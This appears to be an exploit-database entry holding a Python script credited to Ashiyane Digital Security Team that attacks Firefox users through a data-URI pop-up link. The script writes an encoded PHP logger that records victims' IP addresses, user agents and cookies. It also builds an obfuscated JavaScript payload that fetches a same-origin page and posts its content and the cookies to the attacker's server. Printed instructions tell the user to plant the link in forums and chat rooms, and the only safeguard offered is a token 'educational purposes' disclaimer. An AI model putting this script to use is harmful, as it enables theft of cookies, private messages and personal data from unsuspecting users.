Mozilla Firefox Pop-up/New_tab Link Based Informatin Leaking Attack Exploit

2017.03.17
ir Ashiyane Digital Security Team (IR) ir
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#save as a Python file and run from terminal import base64 import io import platform import os happyman1=base64.b64decode("ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC4uDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLCwsICAgICAgICAgICAgICAgICAgICAgICAgIE1NIC5NDQogICAgICAgICAgICAgICAgICAgICAgICAgICAsIU1NTU1NTU0hLCAgICAgICAgICAgICAgICAgICAgIE1NIE1NICAsLg0KICAgLiwgLk0gICAgICAgICAgICAgICAgLk1NTU1NTU1NTU1NTU1NTU0uLCAgICAgICAgICAnTU0uICBNTSBNTSAuTScNCiAuIE06IE07ICBNICAgICAgICAgIC5NTU1NTU1NTU1NTU1NTU1NTU1NTU1NLCAgICAgICAgICAnTU0sOk0gTSchTScNCjtNIE1NIE06IC5NICAgICAgICAuTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU0sICAgICAgICAgJ01NJy4uLidNDQogTTtNTTtNIDpNTSAgICAgIC5NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU0uICAgICAgIC5NTU1NTU1NTQ0KICdNO00nTSBNTSAgICAgIE1NTU1NTSAgTU1NTU1NTU1NTU1NTU1NTU0gIE1NTU1NTS4gICAgLCxNLk0uJ01NTScNCiAgTU0nTU1NTSAgICAgIE1NTU1NTSBAQCBNTU1NTU1NTU1NTU1NTU0gQEAgTU1NTU1NTS4nTScnTU1NTTtNTScNCiBNTS4sICxNTSAgICAgTU1NTU1NTU0gIE1NTU1NTU1NTU1NTU1NTU1NICBNTU1NTU1NTU0gICAgICAnLk1NTQ0KICdNTTtNTU1NTU1NTS5NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTS4gICAgICAnTU1NDQogICcnLidNTU0nICAuTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTSAgICAgICBNTU1NDQogICBNTUMgICAgICBNTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTS4gICAgICAnTU1NTQ0KICAuTU0gICAgICA6TU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTScnTU1NICAgICAgIE1NTU1NDQogIE1NTSAgICAgIDpNICAnTU1NTU1NTU1NTU1NTS5NTU1NTS5NTU1NTU1NTU1NJy5NTSAgTU06TS4gICAgJ01NTU1NDQogLk1NTSAgIC4uLjpNOiA6TS4nTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTScuTScnICAgTU06TU1NTU1NTU1NTU1NJw0KQU1NTS4uTU1NTU06TS4gICAgOk0uJ01NTU1NTU1NTU1NTU1NTU1NTU1NJy5NTScgICAgIE1NJycnJycnJycnJycnDQpNTU1NTU1NTU1NTTpNTSAgICAgJ00nLk0nTU1NTU1NTU1NTU1NTU0nLk1DJ00nICAgICAuTU0NCiAnJycnJycnJycnOk1NLiAgICAgICAnTU0hTS4nTS1NLU0tTSdNLidNTScgICAgICAgIE1NTQ0KICAgICAgICAgICAgTU1NLiAgICAgICAgICAgICdNTU1NIU1NTU0nICAgICAgICAgICAgLk1NDQogICAgICAgICAgICAgTU1NLiAgICAgICAgICAgICAnJycgICAnJyAgICAgICAgICAgIC5NTScNCiAgICAgICAgICAgICAgTU1NLiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNTU0nDQogICAgICAgICAgICAgICBNTU1NICAgICAgICAgICAgLC5KLkpKSkouICAgICAgIC5NTU0nDQogICAgICAgICAgICAgICAgTU1NTS4gICAgICAgJ0pKSkpKSkonSkpKTSAgIENNTU1NTQ0KICAgICAgICAgICAgICAgICAgTU1NTU0uICAgICdKSkpKSkpKSidKSkogLk1NTU1NJw0KICAgICAgICAgICAgICAgICAgICBNTU1NTU1NTS4nICAnSkpKSkonSkpNTU1NTScNCiAgICAgICAgICAgICAgICAgICAgICAnTU1NTU1NTU1NJ0pKSkpKIEpKSkpKJw0KICAgICAgICAgICAgICAgICAgICAgICAgICcnTU1NTU1NSkpKSkpKSkpKSicNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdKSkpKSkpKSic=") happyman2=base64.b64decode("ICAgICAgICAgICAgICAgICAgICAgKioqICAgICAgICAgICAgICAgICAgKioqDQogICAgICAgICAgICAgICAgICAgICoqKioqICAgICAgICAgICAgICAgICoqKioqDQogICAgICAgICAgICAgICAgICAgICoqKioqICAgICAgICAgICAgICAgICoqKioqDQogICAgICAgICAgICAgICAgICAgICAqKiogICAgICAgICAgICAgICAgICAqKioNCiAgICAgICAgICAqKiogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgKioqDQogICAgICAgICAgICoqKiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgKioqDQogICAgICAgICAgICAqKiogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAqKioNCiAgICAgICAgICAgICAqKiogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgKioqDQogICAgICAgICAgICAgICAqKiogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAqKioNCiAgICAgICAgICAgICAgICAgKioqICAgICAgICAgICAgICAgICAgICAgICAgICAqKioNCiAgICAgICAgICAgICAgICAgICAqKiogICAgICAgICAgICAgICAgICAgICAgKioqDQogICAgICAgICAgICAgICAgICAgICAgKioqKioqKioqKioqKioqKioqKioqKg0KICAgICAgICAgICAgICAgICAgICAgICAgICoqKioqKioqKioqKioqKio=") sadman=base64.b64decode("ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAuDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBgLg0KDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLi4uDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYC4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAuLg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYC4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICBgLiAgICAgICAgYC4NCiAgICAgICAgICAgICAgICAgICAgICAgICBfX19gLlwuLy8NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICBgLS0tLi0tLQ0KICAgICAgICAgICAgICAgICAgICAgICAgICAgLyAgICAgXC4tLQ0KICAgICAgICAgICAgICAgICAgICAgICAgICAvICAgICAgIFwtDQogICAgICAgICAgICAgICAgICAgICAgICAgfCAgIC9cICAgIFwNCiAgICAgICAgICAgICAgICAgICAgICAgICB8XD09L1w9PS8gIHwNCiAgICAgICAgICAgICAgICAgICAgICAgICB8IGBAJ2BAJyAgLi0tLg0KICAgICAgICAgICAgICAgICAgLi0tLS0tLS0tLiAgICAgICAgICAgKQ0KICAgICAgICAgICAgICAgIC4nICAgICAgICAgICAgIC4gICBgLl8vDQogICAgICAgICAgICAgICAvICAgICAgICAgICAgICAgfCAgICAgXA0KICAgICAgICAgICAgICAuICAgICAgICAgICAgICAgLyAgICAgICB8DQogICAgICAgICAgICAgIHwgICAgICAgICAgICAgIC8gICAgICAgIHwNCiAgICAgICAgICAgICAgfCAgICAgICAgICAgIC4nICAgICAgICAgfCAgIC4tLS4NCiAgICAgICAgICAgICAuJ2AuICAgICAgICAuJ18gICAgICAgICAgfCAgLyAgICBcDQogICAgICAgICAgIC4nICAgIGAuX18uLS0nLi0tYC4gICAgICAgLyAuJyAgICAgIHwNCiAgICAgICAgIC4nICAgICAgICAgICAgLnwgICAgXFwgICAgIHxfLyAgICAgICAgfA0KICAgICAgIC4nICAgICAgICAgICAgLicgfCAgICAgXFwgICAgICAgICAgICAgICB8DQogICAgIC4tYC4gICAgICAgICAgIC8gICB8ICAgICAgLiAgICAgIF9fICAgICAgIHwNCiAgIC4nICAgIGAuICAgICBcICAgfCAgIGAgICAgICAgICAgIC4nICApICAgICAgXA0KICAvICAgICAgICBcICAgLyBcICB8ICAgICAgICAgICAgLi0nICAgLyAgICAgICB8DQogKCAgLyAgICAgICBcIC8gICBcIHwgICAgICAgICAgICAgICAgIHwgICAgICAgIHwNCiAgXC8gICAgICAgICAoICAgICBcLyAgICAgICAgICAgICAgICAgfCAgICAgICAgfA0KICAoICAvICAgICAgICApICAgIC8gICAgICAgICAgICAgICAgIC8gICBfLi0tLS18DQogICBcLyAgIC8vICAgLyAgIC4nICAgICAgICAgICAgICAgICAgfC4tJyAgICAgICBgDQogICAoICAgLyggICAvICAgLyAgICAgICAgICAgICAgICAgICAgLyAgICAgIGAuICAgfA0KICAgIGAuKCAgYC0nKSAgLi0tLS4gICAgICAgICAgICAgICAgfCAgICBgLiAgIGAuXy8NCiAgICAgICBgLl8uJyAgLyAgICAgYC4gICAuLS0tLiAgICAgIHwgIC4gICBgLl8uJw0KICAgICAgICAgICAgICB8ICAgICAgIFwgLyAgICAgYC4gICAgIFwgIGAuX19fLicNCiAgICAgICAgICAgICAgfCAgICAgICAgWSAgICAgICAgYC4gICAgYC5fX18uJw0KICAgICAgICAgICAgICB8ICAgICAgLiB8ICAgICAgICAgIFwgICAgICAgICBcDQogICAgICAgICAgICAgIHwgICAgICAgYHwgICAgICAgICAgIFwgICAgICAgICB8DQogICAgICAgICAgICAgIHwgICAgICAgIHwgICAgICAgLiAgICBcICAgICAgICB8DQogICAgICAgICAgICAgIHwgICAgICAgIHwgICAgICAgIFwgICAgXCAgICAgICB8DQogICAgICAgICAgICAuLS0uICAgICAgIHwgICAgICAgICBcICAgICAgICAgICB8DQogICAgICAgICAgIC8gICAgYC4gIC4tLS0tLiAgICAgICAgXCAgICAgICAgICAvDQogICAgICAgICAgLyAgICAgICBcLyAgICAgIFwgICAgICAgIFwgICAgICAgIC8NCiAgICAgICAgICB8ICAgICAgIHwgICAgICAgIFwgICAgICAgfCAgICAgICAvDQogICAgICAgICAgIFwgICAgICB8ICAgIEAgICAgXCAgIGAtLiBcICAgICAvDQogICAgICAgICAgICBcICAgICAgXCAgICAgICAgIFwgICAgIFx8Ll9fLicNCiAgICAgICAgICAgICBcICAgICAgXCAgICAgICAgIFwgICAgIHwNCiAgICAgICAgICAgICAgXCAgICAgIFwgICAgICAgICBcICAgIHwNCiAgICAgICAgICAgICAgIFwgICAgICBcICAgICAgICAgXCAgIHwNCiAgICAgICAgICAgICAgICBcICAgIC4nYC4gICAgICAgIFwgIHwNCiAgICAgICAgICAgICAgICAgYC4tJyAgICBgLiAgICBfLidcIHwNCiAgICAgICAgICAgICAgICAgICB8ICAgICAgIGAuLScgICAgfHwNCiAgICAgICAgICAgICAgLiAgICAgXCAgICAgLiBgLiAgICAgfHwgICAgICAuJw0KICAgICAgICAgICAgICAgYC4gICAgYC0uLScgICAgYC5fXy4nICAgICAuJw0KICAgICAgICAgICAgICAgICBgLiAgICAgICAgICAgICAgICAgICAgLicNCiAgICAgICAgICAgICAuICAgICAgICAgICAgICAgICAgICAgICAuJw0KICAgICAgICAgICAgICBgLg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC4tJw0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC4tJw0KDQogICAgICBcICAgICAgICAgICAgICAgICBcDQogICAgICAgXCAgICAgICAgIC4uICAgICAgXA0KICAgICAgICBcICAgICAgIC8gIGAtLi0tLl9fXyBfXy4tLl9fXw0KYC0uICAgICAgXCAgICAgLyAgIyAgIGAtLl8uLScgICAgXCAgIGAtLS5fXw0KICAgYC0uICAgICAgICAvICAjIyMjICAgIC8gICAjIyMgIFwgICAgICAgIGAuDQpfX19fX19fXyAgICAgLyAgIyMjIyAjIyMjIyMjIyMjIyMgIHwgICAgICAgX3wgICAgICAgICAgIC4nDQogICAgICAgICAgICB8XCAjIyMjICMjIyMjIyMjIyMjIyMjICBcX18uLS0nIHwgICAgLyAgICAuJw0KICAgICAgICAgICAgfCAjIyMjIyMjIyMjIyMjIyMjIyMjIyAgfCAgICAgICB8ICAgLyAgIC4nDQogICAgICAgICAgICB8ICMjIyMgIyMjIyMjIyMjIyMjIyMjICB8ICAgICAgIHwgIC8NCiAgICAgICAgICAgIHwgIyMjIyAjIyMjIyMjIyMjIyMjIyMgIHwgICAgICAvfCAgICAgIC0tLS0NCiAgICAgICAgICAuIHwgIyMjIyAjIyMjIyMjIyMjIyMjIyMgIHwgICAgLic8ICAgIF9fX18NCiAgICAgICAgLicgIHwgIyMjIyMjIyMjIyMjIyMjIyMjIyMgIHwgXy4nLSdcfA0KICAgICAgLicgICAgfCAgICMjIyMjIyMjIyMjIyMjIyMjIyAgfCAgICAgICB8DQogICAgICAgICAgICAgYC4gICAjIyMjIyMjIyMjIyMjIyMjICB8ICAgICAgIHwNCiAgICAgICAgICAgICAgIGAuICAgICMjIyMjIyMjIyMjIyAgIHwgICAgICAgfCAtLS0tDQogICAgICAgICAgICAgIF9fX2AuICAgICAjIyMjIyAgICAgXy4uX19fXy4tJyAgICAgLg0KICAgICAgICAgICAgIHxgLS5fIGAtLl8gICAgICAgXy4tJyAgICBcXFwgICAgICAgICBgLg0KICAgICAgICAgIC4nYC0uXyAgYC0uXyBgLS5fLi0nYC0tLl9fXy4tJyBcICAgICAgICAgIGAuDQogICAgICAgIC4nIC4uIC4gYC0uXyAgYC0uXyAgICAgICAgX19fLi0tLSd8ICAgXCAgIFwNCiAgICAgIC4nIC4uIC4gLi4gLiAgYC0uXyAgYC0uX18uLScgICAgICAgIHwgICAgXCAgIFwNCiAgICAgfGAtLiAuIC4uICAuIC4uIC4gIGAtLl98ICAgICAgICAgICAgIHwgICAgIFwgICBcDQogICAgIHwgICBgLS5fIC4gLi4gIC4gLi4gICAuJyAgICAgICAgICAgIF98DQogICAgICBgLS5fICAgYC0uXyAuIC4uICAgLicgfCAgICAgIF9fLi0tJw0KICAgICAgICAgIGAtLl8gICBgLS5fICAuJyAuJ3xfXy4tLScNCiAgICAgICAgICAgICAgYC0uXyAgIGAnIC4nDQogICAgICAgICAgICAgICAgICBgLS5fLic=") base64Exploit ="""PD9waHANCiRkYXRhPXN0cl9yZXBsYWNlKCIgIiwiKyIsJF9QT1NUWydkYXRhJ10pOw0KJGNvb2tpZXM9JF9QT1NUWydjb29raWVzJ107DQokaW5mbz0nPGh0bWw+PGJvZHk+PGZvbnQgY29sb3I9ImJsdWUiIHNpemU9IjUiPkxlYWtlZCBJbmZvcm1hdGlvbnM8L2ZvbnQ+PGJyPjxmb250IGNvbG9yPSJncmVlbiIgc2l6ZT0iMyI+VmljdGltIElQOicuJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10uIjxicj48YnI+VmljdGltIFVTRVIgQUdFTlQ6Ii4kX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10uIjxicj48YnI+Q29va2llczo8YnI+Ii4kY29va2llcy4iPC9mb250Pjxocj4iOw0KJGRhdGE9IjxodG1sPjxib2R5IG9ubG9hZD0iLiInIi4nDQp2YXIgQmFzZTY0PXtfa2V5U3RyOiJBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWmFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6MDEyMzQ1Njc4OSsvPSIsZW5jb2RlOmZ1bmN0aW9uKGUpe3ZhciB0PSIiO3ZhciBuLHIsaSxzLG8sdSxhO3ZhciBmPTA7ZT1CYXNlNjQuX3V0ZjhfZW5jb2RlKGUpO3doaWxlKGY8ZS5sZW5ndGgpe249ZS5jaGFyQ29kZUF0KGYrKyk7cj1lLmNoYXJDb2RlQXQoZisrKTtpPWUuY2hhckNvZGVBdChmKyspO3M9bj4+MjtvPShuJjMpPDw0fHI+PjQ7dT0ociYxNSk8PDJ8aT4+NjthPWkmNjM7aWYoaXNOYU4ocikpe3U9YT02NH1lbHNlIGlmKGlzTmFOKGkpKXthPTY0fXQ9dCt0aGlzLl9rZXlTdHIuY2hhckF0KHMpK3RoaXMuX2tleVN0ci5jaGFyQXQobykrdGhpcy5fa2V5U3RyLmNoYXJBdCh1KSt0aGlzLl9rZXlTdHIuY2hhckF0KGEpfXJldHVybiB0fSxkZWNvZGU6ZnVuY3Rpb24oZSl7dmFyIHQ9IiI7dmFyIG4scixpO3ZhciBzLG8sdSxhO3ZhciBmPTA7ZT1lLnJlcGxhY2UoL1teQS1aYS16MC05Ky89XS9nLCIiKTt3aGlsZShmPGUubGVuZ3RoKXtzPXRoaXMuX2tleVN0ci5pbmRleE9mKGUuY2hhckF0KGYrKykpO289dGhpcy5fa2V5U3RyLmluZGV4T2YoZS5jaGFyQXQoZisrKSk7dT10aGlzLl9rZXlTdHIuaW5kZXhPZihlLmNoYXJBdChmKyspKTthPXRoaXMuX2tleVN0ci5pbmRleE9mKGUuY2hhckF0KGYrKykpO249czw8MnxvPj40O3I9KG8mMTUpPDw0fHU+PjI7aT0odSYzKTw8NnxhO3Q9dCtTdHJpbmcuZnJvbUNoYXJDb2RlKG4pO2lmKHUhPTY0KXt0PXQrU3RyaW5nLmZyb21DaGFyQ29kZShyKX1pZihhIT02NCl7dD10K1N0cmluZy5mcm9tQ2hhckNvZGUoaSl9fXQ9QmFzZTY0Ll91dGY4X2RlY29kZSh0KTtyZXR1cm4gdH0sX3V0ZjhfZW5jb2RlOmZ1bmN0aW9uKGUpe2U9ZS5yZXBsYWNlKC9ybi9nLCJuIik7dmFyIHQ9IiI7Zm9yKHZhciBuPTA7bjxlLmxlbmd0aDtuKyspe3ZhciByPWUuY2hhckNvZGVBdChuKTtpZihyPDEyOCl7dCs9U3RyaW5nLmZyb21DaGFyQ29kZShyKX1lbHNlIGlmKHI+MTI3JiZyPDIwNDgpe3QrPVN0cmluZy5mcm9tQ2hhckNvZGUocj4+NnwxOTIpO3QrPVN0cmluZy5mcm9tQ2hhckNvZGUociY2M3wxMjgpfWVsc2V7dCs9U3RyaW5nLmZyb21DaGFyQ29kZShyPj4xMnwyMjQpO3QrPVN0cmluZy5mcm9tQ2hhckNvZGUocj4+NiY2M3wxMjgpO3QrPVN0cmluZy5mcm9tQ2hhckNvZGUociY2M3wxMjgpfX1yZXR1cm4gdH0sX3V0ZjhfZGVjb2RlOmZ1bmN0aW9uKGUpe3ZhciB0PSIiO3ZhciBuPTA7dmFyIHI9YzE9YzI9MDt3aGlsZShuPGUubGVuZ3RoKXtyPWUuY2hhckNvZGVBdChuKTtpZihyPDEyOCl7dCs9U3RyaW5nLmZyb21DaGFyQ29kZShyKTtuKyt9ZWxzZSBpZihyPjE5MSYmcjwyMjQpe2MyPWUuY2hhckNvZGVBdChuKzEpO3QrPVN0cmluZy5mcm9tQ2hhckNvZGUoKHImMzEpPDw2fGMyJjYzKTtuKz0yfWVsc2V7YzI9ZS5jaGFyQ29kZUF0KG4rMSk7YzM9ZS5jaGFyQ29kZUF0KG4rMik7dCs9U3RyaW5nLmZyb21DaGFyQ29kZSgociYxNSk8PDEyfChjMiY2Myk8PDZ8YzMmNjMpO24rPTN9fXJldHVybiB0fX0NCmRvY3VtZW50LmJvZHkuaW5uZXJIVE1MPWF0b2IoIicuYmFzZTY0X2VuY29kZSgkaW5mbykuJyIpOw0KZG9jdW1lbnQuYm9keS5pbm5lckhUTUwrPUJhc2U2NC5kZWNvZGUoIicuJGRhdGEuJyIpOycuIic+Ii4NCic8L2JvZHk+PC9odG1sPic7DQpmdW5jdGlvbiBnZW5lcmF0ZVJhbmRvbVN0cmluZygpIHsNCiAgICAkY2hhcmFjdGVycyA9ICcwMTIzNDU2Nzg5YWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXonOw0KICAgICRjaGFyYWN0ZXJzTGVuZ3RoID0gc3RybGVuKCRjaGFyYWN0ZXJzKTsNCiAgICAkcmFuZG9tU3RyaW5nID0gJyc7DQogICAgZm9yICgkaSA9IDA7ICRpIDwgNTsgJGkrKykgew0KICAgICAgICAkcmFuZG9tU3RyaW5nIC49ICRjaGFyYWN0ZXJzW3JhbmQoMCwgJGNoYXJhY3RlcnNMZW5ndGggLSAxKV07DQogICAgfQ0KICAgIHJldHVybiAkcmFuZG9tU3RyaW5nOw0KfQ0KZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10uIl8iLmdlbmVyYXRlUmFuZG9tU3RyaW5nKCkuIi5odG1sIiwgJGRhdGEgLCBGSUxFX0FQUEVORCB8IExPQ0tfRVgpOw0KPz4=""" def ColourMe(txt,colour): opsys = platform.system() if (opsys=="Linux"): from termcolor import colored return colored(txt,colour) else: return txt def PrepareLink(i1,i2,i3,i4): stealer=base64.b64decode("ZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoIm1uaCIpLnJlbW92ZSgpO3ZhciBCYXNlNjQ9e19rZXlTdHI6IkFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXowMTIzNDU2Nzg5Ky89IixlbmNvZGU6ZnVuY3Rpb24oZSl7dmFyIHQ9IiI7dmFyIG4scixpLHMsbyx1LGE7dmFyIGY9MDtlPUJhc2U2NC5fdXRmOF9lbmNvZGUoZSk7d2hpbGUoZjxlLmxlbmd0aCl7bj1lLmNoYXJDb2RlQXQoZisrKTtyPWUuY2hhckNvZGVBdChmKyspO2k9ZS5jaGFyQ29kZUF0KGYrKyk7cz1uPj4yO289KG4mMyk8PDR8cj4+NDt1PShyJjE1KTw8MnxpPj42O2E9aSY2MztpZihpc05hTihyKSl7dT1hPTY0fWVsc2UgaWYoaXNOYU4oaSkpe2E9NjR9dD10K3RoaXMuX2tleVN0ci5jaGFyQXQocykrdGhpcy5fa2V5U3RyLmNoYXJBdChvKSt0aGlzLl9rZXlTdHIuY2hhckF0KHUpK3RoaXMuX2tleVN0ci5jaGFyQXQoYSl9cmV0dXJuIHR9LGRlY29kZTpmdW5jdGlvbihlKXt2YXIgdD0iIjt2YXIgbixyLGk7dmFyIHMsbyx1LGE7dmFyIGY9MDtlPWUucmVwbGFjZSgvW15BLVphLXowLTkrLz1dL2csIiIpO3doaWxlKGY8ZS5sZW5ndGgpe3M9dGhpcy5fa2V5U3RyLmluZGV4T2YoZS5jaGFyQXQoZisrKSk7bz10aGlzLl9rZXlTdHIuaW5kZXhPZihlLmNoYXJBdChmKyspKTt1PXRoaXMuX2tleVN0ci5pbmRleE9mKGUuY2hhckF0KGYrKykpO2E9dGhpcy5fa2V5U3RyLmluZGV4T2YoZS5jaGFyQXQoZisrKSk7bj1zPDwyfG8+PjQ7cj0obyYxNSk8PDR8dT4+MjtpPSh1JjMpPDw2fGE7dD10K1N0cmluZy5mcm9tQ2hhckNvZGUobik7aWYodSE9NjQpe3Q9dCtTdHJpbmcuZnJvbUNoYXJDb2RlKHIpfWlmKGEhPTY0KXt0PXQrU3RyaW5nLmZyb21DaGFyQ29kZShpKX19dD1CYXNlNjQuX3V0ZjhfZGVjb2RlKHQpO3JldHVybiB0fSxfdXRmOF9lbmNvZGU6ZnVuY3Rpb24oZSl7ZT1lLnJlcGxhY2UoL3JuL2csIm4iKTt2YXIgdD0iIjtmb3IodmFyIG49MDtuPGUubGVuZ3RoO24rKyl7dmFyIHI9ZS5jaGFyQ29kZUF0KG4pO2lmKHI8MTI4KXt0Kz1TdHJpbmcuZnJvbUNoYXJDb2RlKHIpfWVsc2UgaWYocj4xMjcmJnI8MjA0OCl7dCs9U3RyaW5nLmZyb21DaGFyQ29kZShyPj42fDE5Mik7dCs9U3RyaW5nLmZyb21DaGFyQ29kZShyJjYzfDEyOCl9ZWxzZXt0Kz1TdHJpbmcuZnJvbUNoYXJDb2RlKHI+PjEyfDIyNCk7dCs9U3RyaW5nLmZyb21DaGFyQ29kZShyPj42JjYzfDEyOCk7dCs9U3RyaW5nLmZyb21DaGFyQ29kZShyJjYzfDEyOCl9fXJldHVybiB0fSxfdXRmOF9kZWNvZGU6ZnVuY3Rpb24oZSl7dmFyIHQ9IiI7dmFyIG49MDt2YXIgcj1jMT1jMj0wO3doaWxlKG48ZS5sZW5ndGgpe3I9ZS5jaGFyQ29kZUF0KG4pO2lmKHI8MTI4KXt0Kz1TdHJpbmcuZnJvbUNoYXJDb2RlKHIpO24rK31lbHNlIGlmKHI+MTkxJiZyPDIyNCl7YzI9ZS5jaGFyQ29kZUF0KG4rMSk7dCs9U3RyaW5nLmZyb21DaGFyQ29kZSgociYzMSk8PDZ8YzImNjMpO24rPTJ9ZWxzZXtjMj1lLmNoYXJDb2RlQXQobisxKTtjMz1lLmNoYXJDb2RlQXQobisyKTt0Kz1TdHJpbmcuZnJvbUNoYXJDb2RlKChyJjE1KTw8MTJ8KGMyJjYzKTw8NnxjMyY2Myk7bis9M319cmV0dXJuIHR9fQ0KdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOw0KeGhyLm9ucmVhZHlzdGF0ZWNoYW5nZSA9IGZ1bmN0aW9uKCkgew0KICAgIGlmICh4aHIucmVhZHlTdGF0ZSA9PSBYTUxIdHRwUmVxdWVzdC5ET05FKSB7DQp2YXIgeGhyMiA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOw0KeGhyMi5vcGVuKCJQT1NUIiwgIg==")+i1+base64.b64decode("IiwgdHJ1ZSk7DQp4aHIyLnNldFJlcXVlc3RIZWFkZXIoIkNvbnRlbnQtVHlwZSIsICJhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQiKTsNCnhocjIuc2VuZCgiZGF0YT0iK0Jhc2U2NC5lbmNvZGUoeGhyLnJlc3BvbnNlVGV4dCkrICImY29va2llcz0iK2RvY3VtZW50LmNvb2tpZSk7DQogICAgfQ0KfQ0KeGhyLm9wZW4oIkdFVCIsICI=")+i2+base64.b64decode("IiwgdHJ1ZSk7DQp4aHIuc2VuZChudWxsKTs=") BadIMGTag="<img id='mnh' src='d:s' style='display: none;' onerror='"+stealer+"'>" HTMLCode="<html><body onload='window.opener.document.body.innerHTML+=atob("+'"'+base64.b64encode(BadIMGTag)+'"'+");document.location=atob("+'"'+base64.b64encode(i4)+'"'+");'>"+'</body></html>' print ColourMe("\n\n"+happyman1+"\n\n","green") print ColourMe('The malicious link is here:',"cyan") print '============================\n<a target="_blank" href="data:text/html;base64,'+base64.b64encode(HTMLCode)+'">'+i3+'</a>\n============================' print '\nInject this link to the page of forums,Websites,Chat-rooms,... that allows you to insert Pop-up/new_tab link tags.If a firefox user clicks on it,his cookies and sensitive informations will be saved on your web host(in the folder that you uploaded logger.php).Note:All Firefox-based browsers are vulnerable.This Exploit does not affect IE,Chrome.Other browsers such as Opera,Safari,...may be vulnerable.I don'+"'"+'t know.You should test it!\n\n\n'+'Injection methods:\n\n1-HTML Link tag injection:\nIf you can insert a link tag you should paste the copied link element to a page and submit it\n\n2-Injection by Link adder tools:\nSome forums,chat-rooms,... don'+"'t "+'allow you to insert html link tags.So you should create a link with the fallowing properties and submit it:\nLabel:'+i3+'\nAddress or href:data:text/html;base64,'+base64.b64encode(HTMLCode)+'\ntarget(must be pop up or new tab link):_blank'+'\n\nEnjoy and be a professional exploiter!Bye.\n'+base64.b64decode("KCAgX19fIFwgfFwgICAgIC98KCAgX19fXyBcKCApDQp8ICggICApICkoIFwgICAvICl8ICggICAgXC98IHwNCnwgKF9fLyAvICBcIChfKSAvIHwgKF9fICAgIHwgfA0KfCAgX18gKCAgICBcICAgLyAgfCAgX18pICAgfCB8DQp8ICggIFwgXCAgICApICggICB8ICggICAgICAoXykNCnwgKV9fXykgKSAgIHwgfCAgIHwgKF9fX18vXCBfIA0KfC8gXF9fXy8gICAgXF8vICAgKF9fX19fX18vKF8pDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICA=") def Exploit(): with io.FileIO(os.path.dirname(os.path.realpath(__file__))+"/logger.php", "w") as file: file.write(base64.b64decode(base64Exploit)) logger_link = raw_input("\nlogger.php file was created by this python script in the current folder.\nUpload it to your Web Server,Insert the HTTP address(URL) of file after uploading(for example:http://badhacker.com/folder/to/file/logger.php):") stolen_page = raw_input("\nInsert the URL of the page you want to steal it.You can steal private messages,personal informations,settings,...( this and the link container page MUST have the same origion)(for example:http://victimforum.com/privatemessages.php?page=1):") title = raw_input("\nInsert some text for label of the malicious link(for example:Click Me!):") fake_url = raw_input("\nInsert the URL of the page that victim will visit by your malicious link(for example:https://google.com):") print "\nHere is what you want:\nlogger.php file URL:"+logger_link+"\nPage you want to steal:"+stolen_page+"\nTitle of the malicious link:"+title+"\nFake URL of the malicious link:"+fake_url+"\n\n\n\n\n" correct = raw_input(ColourMe("Is it correct?(","white")+ColourMe("y","green")+ColourMe("/","white")+ColourMe("n","red")+ColourMe("):","white")) while(correct!="y"): if correct=="n": print ColourMe("Sorry.Restart the exploit and try again.\n"+sadman,"red") exit() else: correct = raw_input(ColourMe("Is it correct?(","white")+ColourMe("y","green")+ColourMe("/","white")+ColourMe("n","red")+ColourMe("):","white")) PrepareLink(logger_link,stolen_page,title,fake_url) banner="""####### # # # ##### # #### # ##### # # # # # # # # # # ##### ## # # # # # # # # ## ##### # # # # # # # # # # # # # # ####### # # # ###### #### # #""" terms="\n\nThis exploit is written for educational purposes only.We are NOT responsible for Illegal usages.Use it at your own risk.\n" info=""" ###################### # Exploit Title : Mozilla Firefox Pop-up/New_tab Link Based Informatin Leaking Attack Exploit # Exploit Author : Ashiyane Digital Security Team # Vendor Homepage : https://www.mozilla.org/en-US/ # Google Dork : N/A # Date: 13 Mar 2017 # Tested On : Kali linux 2 